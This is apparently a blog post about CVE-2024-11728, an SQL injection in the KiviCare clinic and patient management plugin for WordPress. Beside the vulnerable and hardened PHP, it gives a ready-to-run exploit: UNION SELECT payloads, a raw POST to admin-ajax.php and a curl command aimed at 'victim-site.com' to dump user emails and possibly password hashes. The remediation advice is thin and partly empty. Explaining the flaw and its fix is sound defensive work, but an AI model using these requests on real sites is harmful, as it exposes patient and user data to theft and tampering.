The web is an increasingly popular place for healthcare management, but security oversights can put sensitive information at risk. Recently, security researchers and the Wordfence Threat Intelligence team discovered a critical SQL Injection vulnerability in the KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress tracked as CVE-2024-11728.
This post will walk you through what this vulnerability is, how it works, actual exploit details with code snippets, and what you need to do if you’re using KiviCare.
Criticality: High, as attackers can extract protected patient data
The vulnerability lies in how KiviCare handles input in its AJAX handler `tax_calculated_data`. The value is neither escaped nor parameterized, so an attacker can inject SQL through the `visit_type[service_id]` parameter.
## Why is This Dangerous?
Because KiviCare manages medical records, a successful exploit lets attackers directly query the underlying database. They could extract email addresses, patient names, doctor records, and even change or delete data.
## The AJAX Endpoint
KiviCare registers an AJAX action named `tax_calculated_data` that is exposed to both logged-in and logged-out users. It processes requests with parameters such as:
`visit_type[service_id]`
But instead of sanitizing these parameters, their values are inserted directly into an SQL query.
A simplified version of the vulnerable code might look like this:
```php
// Vulnerable PHP snippet (simplified)
// Raw request value: no type check, no escaping
$service_id = $_POST['visit_type']['service_id'];
// The value is interpolated straight into the SQL string
$query = "SELECT price FROM {$wpdb->prefix}kivicare_services WHERE id = $service_id";
// $wpdb->get_var() runs the string exactly as built
$result = $wpdb->get_var($query);
```
Notice: `$service_id` comes from user input and is neither validated, escaped nor parameterized.
## How the SQL Injection Works
Because there is no validation, an attacker can send something malicious for `service_id`, for example:
```
visit_type[service_id]=1 UNION SELECT user_email FROM wp_users WHERE 1=1--
```
This turns the SQL query into:
```sql
SELECT price FROM wp_kivicare_services WHERE id = 1 UNION SELECT user_email FROM wp_users WHERE 1=1--
```
As a result, all user emails in the WordPress site are exposed!
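For contrast, here is a hardened version of the same handler. This is an added example, not the plugin's own code or its actual patch; the table name is taken from the simplified snippet above, and the function name `kc_tax_calculated_data_hardened` is hypothetical. It shows why the UNION payload above stops working once the value is validated and parameterized.

```php
<?php
// Added example (not KiviCare's code): hardened handling of visit_type[service_id].
// Assumes the table name from the page's simplified snippet; the function
// name below is hypothetical.

function kc_tax_calculated_data_hardened() {
    global $wpdb;

    // 1. Validate: the ID must be a positive integer. absint() reduces
    //    "1 UNION SELECT user_email FROM wp_users--" to 1, and anything
    //    non-numeric to 0, which is rejected outright.
    $service_id = isset( $_POST['visit_type']['service_id'] )
        ? absint( wp_unslash( $_POST['visit_type']['service_id'] ) )
        : 0;
    if ( 0 === $service_id ) {
        wp_send_json_error( array( 'message' => 'Invalid service id' ), 400 );
    }

    // 2. Parameterize: $wpdb->prepare() with %d binds the value as an integer,
    //    so it can never become part of the SQL grammar (no UNION can be appended).
    $price = $wpdb->get_var(
        $wpdb->prepare(
            "SELECT price FROM {$wpdb->prefix}kivicare_services WHERE id = %d",
            $service_id
        )
    );

    if ( null === $price ) {
        wp_send_json_error( array( 'message' => 'Service not found' ), 404 );
    }

    wp_send_json_success( array( 'price' => (float) $price ) );
}

// The page states the action is reachable by logged-in and logged-out users,
// so both hooks are registered; reconsider whether nopriv access is needed.
add_action( 'wp_ajax_tax_calculated_data', 'kc_tax_calculated_data_hardened' );
add_action( 'wp_ajax_nopriv_tax_calculated_data', 'kc_tax_calculated_data_hardened' );
```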
## Step 1: Prepare a POST Request
Prepare a POST request (via curl, Burp Suite, or browser DevTools):
```http
POST /wp-admin/admin-ajax.php?action=tax_calculated_data HTTP/1.1
Host: victim-site.com
Content-Type: application/x-www-form-urlencoded

visit_type[service_id]=1 UNION SELECT user_email,2 FROM wp_users--
```
Note: The `UNION SELECT` must match the column count of the original query.
## Step 2: Send the Request
Run this in your terminal (replace victim-site.com):
```bash
curl -X POST https://victim-site.com/wp-admin/admin-ajax.php \
-d 'action=tax_calculated_data&visit_type[service_id]=1 UNION SELECT user_email,2 FROM wp_users--'
```
## Step 3: Analyze the Response
The response will include data grabbed from the wp_users table—typically WordPress user emails or even password hashes.
- Update immediately: Upgrade KiviCare to the latest version (check whether a patch is available after 3.6.4).
- Consider a Web Application Firewall (WAF):
## References and Further Reading
- Wordfence Security Advisory: KiviCare SQLi
- CVE Entry in NVD
- Official Plugin Page
## Final Thoughts
CVE-2024-11728 is a critical reminder that user input must always be escaped and parameterized—especially in healthcare applications. If you run KiviCare, patch immediately and audit your systems.
If you liked this breakdown, or have specific questions about hardening WordPress plugins, leave a comment or share!
*Stay safe, secure, and always keep plugins up to date!*
## Timeline
Published on: 12/06/2024 10:15:05 UTC